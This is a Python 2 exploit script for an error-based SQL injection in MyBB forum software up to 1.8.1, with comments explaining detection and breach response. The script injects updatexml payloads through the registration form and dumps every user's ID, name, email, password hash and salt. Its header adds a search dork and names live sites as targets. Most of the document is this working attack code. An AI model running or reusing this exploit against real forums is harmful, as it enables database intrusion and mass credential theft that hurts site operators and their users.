
MyBB 1.8.X <= 1.8.1 Error based SQL Injection

  1. #!/usr/bin/env python
  2. # Exploit Title: MyBB 1.8.X <= 1.8.1 Error based SQL Injection
  3. # Date : 2014-11-15
  4. # Google Dork : intext:Powered By MyBB
  5. # Vendor Homepage: http://www.mybb.com/
  6. # Software Link: http://resources.mybb.com/downloads/mybb_1801.zip
  7. # Version: 1.8.X
  8. # Tested on: Linux / Python 2.7
  9. # Status : Patched in MyBB 1.8.2
  10. # Author : MakMan -- mak.man@live.com -- https://www.facebook.com/hackticlabs
  11. # Live Vulnerable Targets : http://livedemo.installatron.com/1416038193mybb/ : http://gamergate.community/
  12.  
# --- Module-level state read by inject() further down (whole script is Python 2:
# print statements, raw_input, urllib2). Runs at import time.
print '\n\n---------------------------------------------------------------------------------'
print 'Script Coded by MakMan -- Hacktic Labs -- https://www.facebook.com/hackticlabs'
print '-----------------------MyBB 1.8.X Error based SQL Injection---------------------'
print '---------------------------------------------------------------------------------\n\n\n'
# Base forum URL, read interactively; the trailing slash is stripped so that
# '%s/member.php' in inject() forms a clean path.
url = raw_input('Enter URL http://www.exmaple.com/path_to_mybb :: ')
url = url.rstrip('/')
# Fixed browser User-agent sent with every request. Defender note: because it
# never varies, this exact UA string combined with repeated POSTs to member.php
# is a usable access-log signature for runs of this particular script.
ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36"
  20.  
  21. import sys, re
  22. import urllib2, urllib
  23.  
def inject(sql):
    """Perform one error-based injection round trip and return the scraped text.

    What this function demonstrates, summarised for defenders and reviewers:
      * Vector: the ``question_id`` field of the MyBB registration form
        (``member.php`` with ``action=do_register``). ``sql`` is wrapped in
        ``updatexml(NULL, concat(0x3a, (...)), NULL)`` so the database first
        evaluates the subquery and then fails with an XPath error whose
        message echoes the value after the ':' (0x3a) separator.
      * Oracle: only an HTTP 503 whose body matches
        ``"XPATH syntax error: ':(.*)'"`` counts as success; every other
        outcome (other status, no match, or a normal 2xx reply) ends the
        process via ``sys.exit``, so callers only ever receive captured text.
      * Cost: exactly one registration POST per value extracted, always with
        the same username/password/email fields and the same User-agent, so
        a data dump shows up in access logs as a burst of near-identical
        failed registrations.
      * Detection: alert on ``updatexml(`` / ``concat(`` inside registration
        POST bodies, and on 503 responses whose body contains
        "XPATH syntax error".
      * Mitigation: the file header records this as patched in MyBB 1.8.2;
        upgrading removes the injection point.

    Reads the module globals ``url`` and ``ua``. ``sql`` is a SQL expression
    fragment (not a full statement) and is URL-encoded with ``urllib.quote``.
    Python 2 only (``except X, e`` syntax, ``urllib2``).
    """
    try:
        urllib2.urlopen(urllib2.Request('%s/member.php' % url, data="regcheck1=&regcheck2=true&username=makman&password=mukarram&password2=mukarram&email=mak@live.com&email2=mak@live.com&referrername=&imagestring=F7yR4&imagehash=1c1d0e6eae9c113f4ff65339e4b3079c&answer=4&allownotices=1&receivepms=1&pmnotice=1&subscriptionmethod=0&timezoneoffset=0&dstcorrection=2&regtime=1416039333&step=registration&action=do_register&regsubmit=Submit+Registration!&question_id=makman%s" % urllib.quote("\' and updatexml(NULL,concat (0x3a,(%s)),NULL) and \'1" % sql), headers={"User-agent": ua}))
    except urllib2.HTTPError, e:
            data = e.read()
            if e.code == 503:
                    # The database's XPath error text is the data channel; the
                    # leading ':' comes from the 0x3a in the injected concat().
                    txt = re.search("XPATH syntax error: ':(.*)'", data, re.MULTILINE)
                    if txt is not None:
                        return txt.group(1)
                    sys.exit('Error [3], received unexpected data:\n%s' % data)
            sys.exit('Not Vulnerable i guess !!!')
    # urlopen() returned normally (2xx): the injected expression produced no
    # error, which this script treats as "not vulnerable".
    sys.exit('Not Vulnerable or check your inernet connection !!')
  36.  
def get(name, table, num):
    """Read column expression ``name`` from row ``num`` of ``table`` via inject().

    Builds ``SELECT <name> FROM <table> LIMIT <num>,1`` (plain string
    formatting; the arguments come from this script's own constants and from
    ``members_table``, never from user input), asks the server for the
    value's LENGTH first, and then fetches the value either in one request
    (length below 31) or as consecutive 31-character SUBSTRING windows joined
    in order. The script does not say why the window is 31; presumably the
    scraped error text is length-limited -- not verified here.

    Sizing note for incident response: every value costs at least two
    requests (one LENGTH plus one or more SUBSTRING calls), so the number of
    registration POSTs in the access log is a lower bound on the number of
    fields that were read.
    """
    sqli = 'SELECT %s FROM %s LIMIT %d,1' % (name, table, num)
    s = int(inject('LENGTH((%s))' % sqli))
    if s < 31:
        return inject(sqli)
    else:
        r = ''
        # SUBSTRING offsets are 1-based; each window is 31 characters wide.
        for i in range(1, s+1, 31):
            r += inject('SUBSTRING((%s), %i, %i)' % (sqli, i, 31))
        return r
  47.  
  48.  
# --- Extraction driver (top-level statements, run at import time) ---
# Locate the users table by name: 0x757365727324 is the hex encoding of the
# regexp 'users$', i.e. the first table in the current schema whose name ends
# in "users" (presumably because the table prefix is site-configurable and so
# not known up front -- the script does not say).
members_table= inject('select table_name from information_schema.tables where table_schema=database() and table_name regexp 0x757365727324 limit 0,1')
n = inject('SELECT COUNT(*) FROM %s' % members_table)
print '----------------------------------------------------------------------------'
print '* Found %s users' % n
print '----------------------------------------------------------------------------'
# One block per user row: uid, username, email, and the stored password hash
# joined to its salt by ':' (0x3a). Each get() costs at least two requests, so
# this loop issues at least eight registration POSTs per user.
# Defender note: a completed run means every user's email, password hash and
# salt left the database -- treat it as a full credential breach (force
# password resets, notify users), not merely a disclosed table name.
for j in range(int(n)):
        print '{:20s} {:20s}'.format('Id',get('uid', members_table, j))
        print '{:20s} {:20s}'.format('Name',get('username', members_table, j))
        print '{:20s} {:20s}'.format('Email',get('email', members_table, j))
        print '{:20s} {:20s}'.format('Password : Salt',get('CONCAT(password,0x3a,salt)', members_table, j))
        print '----------------------------------------------------------------------------'